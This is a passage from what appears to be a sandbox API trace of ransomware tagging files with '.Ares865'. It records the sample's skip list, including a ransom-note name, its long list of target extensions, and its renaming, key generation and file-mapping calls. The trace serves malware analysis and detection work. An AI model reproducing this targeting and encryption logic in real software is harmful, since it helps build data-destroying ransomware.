lpString2="perflogs") returned -1 [0083.411] lstrcmpiW (lpString1="MS.INFOPATH.14.1033.hxn", lpString2="MSBuild") returned -1 [0083.411] lstrlenW (lpString="MS.INFOPATH.14.1033.hxn") returned 23 [0083.411] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft Help\\MS.GROOVE.14.1033.hxn") returned 55 [0083.411] lstrcpyW (in: lpString1=0x2cce444, lpString2="MS.INFOPATH.14.1033.hxn" | out: lpString1="MS.INFOPATH.14.1033.hxn") returned="MS.INFOPATH.14.1033.hxn" [0083.411] lstrlenW (lpString="MS.INFOPATH.14.1033.hxn") returned 23 [0083.411] lstrlenW (lpString="Ares865") returned 7 [0083.411] lstrcmpiW (lpString1="033.hxn", lpString2="Ares865") returned -1 [0083.411] lstrlenW (lpString=".dll") returned 4 [0083.411] lstrcmpiW (lpString1="MS.INFOPATH.14.1033.hxn", lpString2=".dll") returned 1 [0083.411] lstrlenW (lpString=".lnk") returned 4 [0083.411] lstrcmpiW (lpString1="MS.INFOPATH.14.1033.hxn", lpString2=".lnk") returned 1 [0083.411] lstrlenW (lpString=".ini") returned 4 [0083.411] lstrcmpiW (lpString1="MS.INFOPATH.14.1033.hxn", lpString2=".ini") returned 1 [0083.411] lstrlenW (lpString=".sys") returned 4 [0083.411] lstrcmpiW (lpString1="MS.INFOPATH.14.1033.hxn", lpString2=".sys") returned 1 [0083.411] lstrlenW (lpString="MS.INFOPATH.14.1033.hxn") returned 23 [0083.412] lstrlenW (lpString="bak") returned 3 [0083.412] lstrcmpiW (lpString1="hxn", lpString2="bak") returned 1 [0083.412] lstrlenW (lpString="ba_") returned 3 [0083.412] lstrcmpiW (lpString1="hxn", lpString2="ba_") returned 1 [0083.412] lstrlenW (lpString="dbb") returned 3 [0083.412] lstrcmpiW (lpString1="hxn", lpString2="dbb") returned 1 [0083.412] lstrlenW (lpString="vmdk") returned 4 [0083.412] lstrcmpiW (lpString1=".hxn", lpString2="vmdk") returned -1 [0083.412] lstrlenW (lpString="rar") returned 3 [0083.412] lstrcmpiW (lpString1="hxn", lpString2="rar") returned -1 [0083.412] lstrlenW (lpString="zip") returned 3 [0083.412] lstrcmpiW (lpString1="hxn", lpString2="zip") returned -1 [0083.412] lstrlenW (lpString="tgz") returned 3 [0083.412] lstrcmpiW (lpString1="hxn", lpString2="tgz") returned -1 [0083.412] lstrlenW (lpString="vbox") returned 4 [0083.412] lstrcmpiW (lpString1=".hxn", lpString2="vbox") returned -1 [0083.412] lstrlenW (lpString="vdi") returned 3 [0083.412] lstrcmpiW (lpString1="hxn", lpString2="vdi") returned -1 [0083.412] lstrlenW (lpString="vhd") returned 3 [0083.412] lstrcmpiW (lpString1="hxn", lpString2="vhd") returned -1 [0083.412] lstrlenW (lpString="vhdx") returned 4 [0083.412] lstrcmpiW (lpString1=".hxn", lpString2="vhdx") returned -1 [0083.412] lstrlenW (lpString="avhd") returned 4 [0083.412] lstrcmpiW (lpString1=".hxn", lpString2="avhd") returned -1 [0083.412] lstrlenW (lpString="db") returned 2 [0083.412] lstrcmpiW (lpString1="xn", lpString2="db") returned 1 [0083.412] lstrlenW (lpString="db2") returned 3 [0083.412] lstrcmpiW (lpString1="hxn", lpString2="db2") returned 1 [0083.412] lstrlenW (lpString="db3") returned 3 [0083.412] lstrcmpiW (lpString1="hxn", lpString2="db3") returned 1 [0083.412] lstrlenW (lpString="dbf") returned 3 [0083.412] lstrcmpiW (lpString1="hxn", lpString2="dbf") returned 1 [0083.412] lstrlenW (lpString="mdf") returned 3 [0083.412] lstrcmpiW (lpString1="hxn", lpString2="mdf") returned -1 [0083.412] lstrlenW (lpString="mdb") returned 3 [0083.412] lstrcmpiW (lpString1="hxn", lpString2="mdb") returned -1 [0083.412] lstrlenW (lpString="sql") returned 3 [0083.412] lstrcmpiW (lpString1="hxn", lpString2="sql") returned -1 [0083.413] lstrlenW (lpString="sqlite") returned 6 [0083.413] lstrcmpiW (lpString1="33.hxn", lpString2="sqlite") returned -1 [0083.413] lstrlenW (lpString="sqlite3") returned 7 [0083.413] lstrcmpiW (lpString1="033.hxn", lpString2="sqlite3") returned -1 [0083.413] lstrlenW (lpString="sqlitedb") returned 8 [0083.413] lstrcmpiW (lpString1="1033.hxn", lpString2="sqlitedb") returned -1 [0083.413] lstrlenW (lpString="xml") returned 3 [0083.413] lstrcmpiW (lpString1="hxn", lpString2="xml") returned -1 [0083.413] lstrlenW (lpString="$er") returned 3 [0083.413] lstrcmpiW (lpString1="hxn", lpString2="$er") returned 1 [0083.413] lstrlenW (lpString="4dd") returned 3 [0083.413] lstrcmpiW (lpString1="hxn", lpString2="4dd") returned 1 [0083.413] lstrlenW (lpString="4dl") returned 3 [0083.413] lstrcmpiW (lpString1="hxn", lpString2="4dl") returned 1 [0083.413] lstrlenW (lpString="^^^") returned 3 [0083.413] lstrcmpiW (lpString1="hxn", lpString2="^^^") returned 1 [0083.413] lstrlenW (lpString="abs") returned 3 [0083.413] lstrcmpiW (lpString1="hxn", lpString2="abs") returned 1 [0083.413] lstrlenW (lpString="abx") returned 3 [0083.413] lstrcmpiW (lpString1="hxn", lpString2="abx") returned 1 [0083.413] lstrlenW (lpString="accdb") returned 5 [0083.413] lstrcmpiW (lpString1="3.hxn", lpString2="accdb") returned -1 [0083.413] lstrlenW (lpString="accdc") returned 5 [0083.413] lstrcmpiW (lpString1="3.hxn", lpString2="accdc") returned -1 [0083.413] lstrlenW (lpString="accde") returned 5 [0083.413] lstrcmpiW (lpString1="3.hxn", lpString2="accde") returned -1 [0083.413] lstrlenW (lpString="accdr") returned 5 [0083.413] lstrcmpiW (lpString1="3.hxn", lpString2="accdr") returned -1 [0083.413] lstrlenW (lpString="accdt") returned 5 [0083.413] lstrcmpiW (lpString1="3.hxn", lpString2="accdt") returned -1 [0083.413] lstrlenW (lpString="accdw") returned 5 [0083.413] lstrcmpiW (lpString1="3.hxn", lpString2="accdw") returned -1 [0083.413] lstrlenW (lpString="accft") returned 5 [0083.413] lstrcmpiW (lpString1="3.hxn", lpString2="accft") returned -1 [0083.413] lstrlenW (lpString="adb") returned 3 [0083.413] lstrcmpiW (lpString1="hxn", lpString2="adb") returned 1 [0083.413] lstrlenW (lpString="adb") returned 3 [0083.413] lstrcmpiW (lpString1="hxn", lpString2="adb") returned 1 [0083.414] lstrlenW (lpString="ade") returned 3 [0083.414] lstrcmpiW (lpString1="hxn", lpString2="ade") returned 1 [0083.414] lstrlenW (lpString="adf") returned 3 [0083.414] lstrcmpiW (lpString1="hxn", lpString2="adf") returned 1 [0083.414] lstrlenW (lpString="adn") returned 3 [0083.414] lstrcmpiW (lpString1="hxn", lpString2="adn") returned 1 [0083.414] lstrlenW (lpString="adp") returned 3 [0083.414] lstrcmpiW (lpString1="hxn", lpString2="adp") returned 1 [0083.414] lstrlenW (lpString="alf") returned 3 [0083.414] lstrcmpiW (lpString1="hxn", lpString2="alf") returned 1 [0083.414] lstrlenW (lpString="ask") returned 3 [0083.414] lstrcmpiW (lpString1="hxn", lpString2="ask") returned 1 [0083.414] lstrlenW (lpString="btr") returned 3 [0083.414] lstrcmpiW (lpString1="hxn", lpString2="btr") returned 1 [0083.414] lstrlenW (lpString="cat") returned 3 [0083.414] lstrcmpiW (lpString1="hxn", lpString2="cat") returned 1 [0083.414] lstrlenW (lpString="cdb") returned 3 [0083.414] lstrcmpiW (lpString1="hxn", lpString2="cdb") returned 1 [0083.414] lstrlenW (lpString="ckp") returned 3 [0083.414] lstrcmpiW (lpString1="hxn", lpString2="ckp") returned 1 [0083.414] lstrlenW (lpString="cma") returned 3 [0083.414] lstrcmpiW (lpString1="hxn", lpString2="cma") returned 1 [0083.414] lstrlenW (lpString="cpd") returned 3 [0083.414] lstrcmpiW (lpString1="hxn", lpString2="cpd") returned 1 [0083.414] lstrlenW (lpString="dacpac") returned 6 [0083.414] lstrcmpiW (lpString1="33.hxn", lpString2="dacpac") returned -1 [0083.414] lstrlenW (lpString="dad") returned 3 [0083.414] lstrcmpiW (lpString1="hxn", lpString2="dad") returned 1 [0083.414] lstrlenW (lpString="dadiagrams") returned 10 [0083.414] lstrcmpiW (lpString1="4.1033.hxn", lpString2="dadiagrams") returned -1 [0083.414] lstrlenW (lpString="daschema") returned 8 [0083.414] lstrcmpiW (lpString1="1033.hxn", lpString2="daschema") returned -1 [0083.414] lstrlenW (lpString="db-journal") returned 10 [0083.414] lstrcmpiW (lpString1="4.1033.hxn", lpString2="db-journal") returned -1 [0083.414] lstrlenW (lpString="db-shm") returned 6 [0083.414] lstrcmpiW (lpString1="33.hxn", lpString2="db-shm") returned -1 [0083.414] lstrlenW (lpString="db-wal") returned 6 [0083.414] lstrcmpiW (lpString1="33.hxn", lpString2="db-wal") returned -1 [0083.415] lstrlenW (lpString="dbc") returned 3 [0083.415] lstrcmpiW (lpString1="hxn", lpString2="dbc") returned 1 [0083.415] lstrlenW (lpString="dbs") returned 3 [0083.415] lstrcmpiW (lpString1="hxn", lpString2="dbs") returned 1 [0083.415] lstrlenW (lpString="dbt") returned 3 [0083.415] lstrcmpiW (lpString1="hxn", lpString2="dbt") returned 1 [0083.415] lstrlenW (lpString="dbv") returned 3 [0083.415] lstrcmpiW (lpString1="hxn", lpString2="dbv") returned 1 [0083.415] lstrlenW (lpString="dbx") returned 3 [0083.415] lstrcmpiW (lpString1="hxn", lpString2="dbx") returned 1 [0083.415] lstrlenW (lpString="dcb") returned 3 [0083.415] lstrcmpiW (lpString1="hxn", lpString2="dcb") returned 1 [0083.415] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\All Users\\Microsoft Help\\MS.INFOPATH.14.1033.hxn.Ares865") returned 65 [0083.415] MoveFileExW (lpExistingFileName="C:\\Users\\All Users\\Microsoft Help\\MS.INFOPATH.14.1033.hxn" (normalized: "c:\\users\\all users\\microsoft help\\ms.infopath.14.1033.hxn"), lpNewFileName="C:\\Users\\All Users\\Microsoft Help\\MS.INFOPATH.14.1033.hxn.Ares865" (normalized: "c:\\users\\all users\\microsoft help\\ms.infopath.14.1033.hxn.ares865"), dwFlags=0x1) returned 1 [0083.419] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft Help\\MS.INFOPATH.14.1033.hxn.Ares865" (normalized: "c:\\users\\all users\\microsoft help\\ms.infopath.14.1033.hxn.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0083.419] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=344) returned 1 [0083.419] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0083.419] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2ef0 [0083.420] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0083.420] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0083.420] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0083.420] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0083.420] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x460, lpName=0x0) returned 0x15c [0083.426] MapViewOfFile (hFileMappingObject=0x15c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x460) returned 0x190000 [0083.427] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0083.427] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0083.427] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0083.427] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0083.427] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2f68 | out: hHeap=0x2b0000) returned 1 [0083.427] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x31afc8 [0083.428] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32afc8 [0083.428] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x31afc8 | out: hHeap=0x2b0000) returned 1 [0083.428] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32b0e0 [0083.428] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9938 [0083.428] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32b0e0 | out: hHeap=0x2b0000) returned 1 [0083.428] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9938 | out: hHeap=0x2b0000) returned 1 [0083.428] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32afc8 | out: hHeap=0x2b0000) returned 1 [0083.428] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0083.428] CloseHandle (hObject=0x15c) returned 1 [0083.428] CloseHandle (hObject=0x118) returned 1 [0083.428] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2ef0 | out: hHeap=0x2b0000) returned 1 [0083.428] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f00d8 | out: hHeap=0x2b0000) returned 1 [0083.428] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cd0020 | out: hHeap=0x2b0000) returned 1 [0083.428] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2022, ftCreationTime.dwLowDateTime=0x113ae4d0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x113ae4d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x1146cbb0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x17c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MS.INFOPATHEDITOR.14.1033.hxn", cAlternateFileName="MSINFO~2.HXN")) returned 1 [0083.428] lstrcmpiW (lpString1="MS.INFOPATHEDITOR.14.1033.hxn", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0083.428] lstrcmpiW (lpString1="MS.INFOPATHEDITOR.14.1033.hxn", lpString2="aoldtz.exe") returned 1 [0083.428] lstrcmpiW (lpString1="MS.INFOPATHEDITOR.14.1033.hxn", lpString2=".") returned 1 [0083.428] lstrcmpiW (lpString1="MS.INFOPATHEDITOR.14.1033.hxn", lpString2="..") returned 1 [0083.428] lstrcmpiW (lpString1="MS.INFOPATHEDITOR.14.1033.hxn", lpString2="windows") returned -1 [0083.429] lstrcmpiW (lpString1="MS.INFOPATHEDITOR.14.1033.hxn", lpString2="bootmgr") returned 1 [0083.429] lstrcmpiW (lpString1="MS.INFOPATHEDITOR.14.1033.hxn", lpString2="temp") returned -1 [0083.429] lstrcmpiW (lpString1="MS.INFOPATHEDITOR.14.1033.hxn", lpString2="pagefile.sys") returned -1 [0083.429] lstrcmpiW (lpString1="MS.INFOPATHEDITOR.14.1033.hxn", lpString2="boot") returned 1 [0083.429] lstrcmpiW (lpString1="MS.INFOPATHEDITOR.14.1033.hxn", lpString2="ids.txt") returned 1 [0083.429] lstrcmpiW (lpString1="MS.INFOPATHEDITOR.14.1033.hxn", lpString2="ntuser.dat") returned -1 [0083.429] lstrcmpiW (lpString1="MS.INFOPATHEDITOR.14.1033.hxn", lpString2="perflogs") returned -1 [0083.429] lstrcmpiW (lpString1="MS.INFOPATHEDITOR.14.1033.hxn", lpString2="MSBuild") returned -1 [0083.429] lstrlenW (lpString="MS.INFOPATHEDITOR.14.1033.hxn") returned 29 [0083.429] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft Help\\MS.INFOPATH.14.1033.hxn") returned 57 [0083.429] lstrcpyW (in: lpString1=0x2cce444, lpString2="MS.INFOPATHEDITOR.14.1033.hxn" | out: lpString1="MS.INFOPATHEDITOR.14.1033.hxn") returned="MS.INFOPATHEDITOR.14.1033.hxn" [0083.429] lstrlenW (lpString="MS.INFOPATHEDITOR.14.1033.hxn") returned 29 [0083.429] lstrlenW (lpString="Ares865") returned 7 [0083.429] lstrcmpiW (lpString1="033.hxn", lpString2="Ares865") returned -1 [0083.429] lstrlenW (lpString=".dll") returned 4 [0083.429] lstrcmpiW (lpString1="MS.INFOPATHEDITOR.14.1033.hxn", lpString2=".dll") returned 1 [0083.429] lstrlenW (lpString=".lnk") returned 4 [0083.429] lstrcmpiW (lpString1="MS.INFOPATHEDITOR.14.1033.hxn", lpString2=".lnk") returned 1 [0083.429] lstrlenW (lpString=".ini") returned 4 [0083.429] lstrcmpiW (lpString1="MS.INFOPATHEDITOR.14.1033.hxn", lpString2=".ini") returned 1 [0083.429] lstrlenW (lpString=".sys") returned 4 [0083.429] lstrcmpiW (lpString1="MS.INFOPATHEDITOR.14.1033.hxn", lpString2=".sys") returned 1 [0083.429] lstrlenW (lpString="MS.INFOPATHEDITOR.14.1033.hxn") returned 29 [0083.429] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\All Users\\Microsoft Help\\MS.INFOPATHEDITOR.14.1033.hxn.Ares865") returned 71 [0083.429] MoveFileExW (lpExistingFileName="C:\\Users\\All Users\\Microsoft Help\\MS.INFOPATHEDITOR.14.1033.hxn" (normalized: "c:\\users\\all users\\microsoft help\\ms.infopatheditor.14.1033.hxn"), lpNewFileName="C:\\Users\\All Users\\Microsoft Help\\MS.INFOPATHEDITOR.14.1033.hxn.Ares865" (normalized: "c:\\users\\all users\\microsoft help\\ms.infopatheditor.14.1033.hxn.ares865"), dwFlags=0x1) returned 1 [0083.430] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft Help\\MS.INFOPATHEDITOR.14.1033.hxn.Ares865" (normalized: "c:\\users\\all users\\microsoft help\\ms.infopatheditor.14.1033.hxn.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0083.430] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=380) returned 1 [0083.430] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0083.431] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2ef0 [0083.431] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0083.431] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0083.431] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0083.431] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0083.432] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x480, lpName=0x0) returned 0x15c [0083.434] MapViewOfFile (hFileMappingObject=0x15c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x480) returned 0x190000 [0083.435] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0083.436] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0083.436] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0083.436] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0083.436] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2f68 | out: hHeap=0x2b0000) returned 1 [0083.436] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x31afc8 [0083.436] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32afc8 [0083.436] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x31afc8 | out: hHeap=0x2b0000) returned 1 [0083.436] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32b0e0 [0083.436] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9d88 [0083.437] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32b0e0 | out: hHeap=0x2b0000) returned 1 [0083.437] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9d88 | out: hHeap=0x2b0000) returned 1 [0083.437] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32afc8 | out: hHeap=0x2b0000) returned 1 [0083.437] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0083.437] CloseHandle (hObject=0x15c) returned 1 [0083.437] CloseHandle (hObject=0x118) returned 1 [0083.437] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2ef0 | out: hHeap=0x2b0000) returned 1 [0083.437] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f00d8 | out: hHeap=0x2b0000) returned 1 [0083.437] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cd0020 | out: hHeap=0x2b0000) returned 1 [0083.437] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2022, ftCreationTime.dwLowDateTime=0x15f8e210, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x15f8e210, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x1604c8f0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x158, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MS.MSACCESS.14.1033.hxn", cAlternateFileName="MSMSAC~1.HXN")) returned 1 [0083.437] lstrcmpiW (lpString1="MS.MSACCESS.14.1033.hxn", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0083.437] lstrcmpiW (lpString1="MS.MSACCESS.14.1033.hxn", lpString2="aoldtz.exe") returned 1 [0083.437] lstrcmpiW (lpString1="MS.MSACCESS.14.1033.hxn", lpString2=".") returned 1 [0083.437] lstrcmpiW (lpString1="MS.MSACCESS.14.1033.hxn", lpString2="..") returned 1 [0083.437] lstrcmpiW (lpString1="MS.MSACCESS.14.1033.hxn", lpString2="windows") returned -1 [0083.437] lstrcmpiW (lpString1="MS.MSACCESS.14.1033.hxn", lpString2="bootmgr") returned 1 [0083.437] lstrcmpiW (lpString1="MS.MSACCESS.14.1033.hxn", lpString2="temp") returned -1 [0083.437] lstrcmpiW (lpString1="MS.MSACCESS.14.1033.hxn", lpString2="pagefile.sys") returned -1 [0083.437] lstrcmpiW (lpString1="MS.MSACCESS.14.1033.hxn", lpString2="boot") returned 1 [0083.437] lstrcmpiW (lpString1="MS.MSACCESS.14.1033.hxn", lpString2="ids.txt") returned 1 [0083.437] lstrcmpiW (lpString1="MS.MSACCESS.14.1033.hxn", lpString2="ntuser.dat") returned -1 [0083.437] lstrcmpiW (lpString1="MS.MSACCESS.14.1033.hxn", lpString2="perflogs") returned -1 [0083.437] lstrcmpiW (lpString1="MS.MSACCESS.14.1033.hxn", lpString2="MSBuild") returned -1 [0083.437] lstrlenW (lpString="MS.MSACCESS.14.1033.hxn") returned 23 [0083.437] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft Help\\MS.INFOPATHEDITOR.14.1033.hxn") returned 63 [0083.438] lstrcpyW (in: lpString1=0x2cce444, lpString2="MS.MSACCESS.14.1033.hxn" | out: lpString1="MS.MSACCESS.14.1033.hxn") returned="MS.MSACCESS.14.1033.hxn" [0083.438] lstrlenW (lpString="MS.MSACCESS.14.1033.hxn") returned 23 [0083.438] lstrlenW (lpString="Ares865") returned 7 [0083.438] lstrcmpiW (lpString1="033.hxn", lpString2="Ares865") returned -1 [0083.438] lstrlenW (lpString=".dll") returned 4 [0083.438] lstrcmpiW (lpString1="MS.MSACCESS.14.1033.hxn", lpString2=".dll") returned 1 [0083.438] lstrlenW (lpString=".lnk") returned 4 [0083.438] lstrcmpiW (lpString1="MS.MSACCESS.14.1033.hxn", lpString2=".lnk") returned 1 [0083.438] lstrlenW (lpString=".ini") returned 4 [0083.438] lstrcmpiW (lpString1="MS.MSACCESS.14.1033.hxn", lpString2=".ini") returned 1 [0083.438] lstrlenW (lpString=".sys") returned 4 [0083.438] lstrcmpiW (lpString1="MS.MSACCESS.14.1033.hxn", lpString2=".sys") returned 1 [0083.438] lstrlenW (lpString="MS.MSACCESS.14.1033.hxn") returned 23 [0083.438] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\All Users\\Microsoft Help\\MS.MSACCESS.14.1033.hxn.Ares865") returned 65 [0083.438] MoveFileExW (lpExistingFileName="C:\\Users\\All Users\\Microsoft Help\\MS.MSACCESS.14.1033.hxn" (normalized: "c:\\users\\all users\\microsoft help\\ms.msaccess.14.1033.hxn"), lpNewFileName="C:\\Users\\All Users\\Microsoft Help\\MS.MSACCESS.14.1033.hxn.Ares865" (normalized: "c:\\users\\all users\\microsoft help\\ms.msaccess.14.1033.hxn.ares865"), dwFlags=0x1) returned 1 [0083.440] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft Help\\MS.MSACCESS.14.1033.hxn.Ares865" (normalized: "c:\\users\\all users\\microsoft help\\ms.msaccess.14.1033.hxn.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0083.440] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=344) returned 1 [0083.440] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0083.440] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2ef0 [0083.440] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0083.440] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0083.441] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0083.441] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0083.441] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x460, lpName=0x0) returned 0x15c [0083.443] MapViewOfFile (hFileMappingObject=0x15c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x460) returned 0x190000 [0083.444] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0083.444] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0083.444] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0083.444] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0083.444] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2f68 | out: hHeap=0x2b0000) returned 1 [0083.444] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x31afc8 [0083.444] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32afc8 [0083.445] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x31afc8 | out: hHeap=0x2b0000) returned 1 [0083.445] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32b0e0 [0083.445] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9938 [0083.445] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32b0e0 | out: hHeap=0x2b0000) returned 1 [0083.445] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9938 | out: hHeap=0x2b0000) returned 1 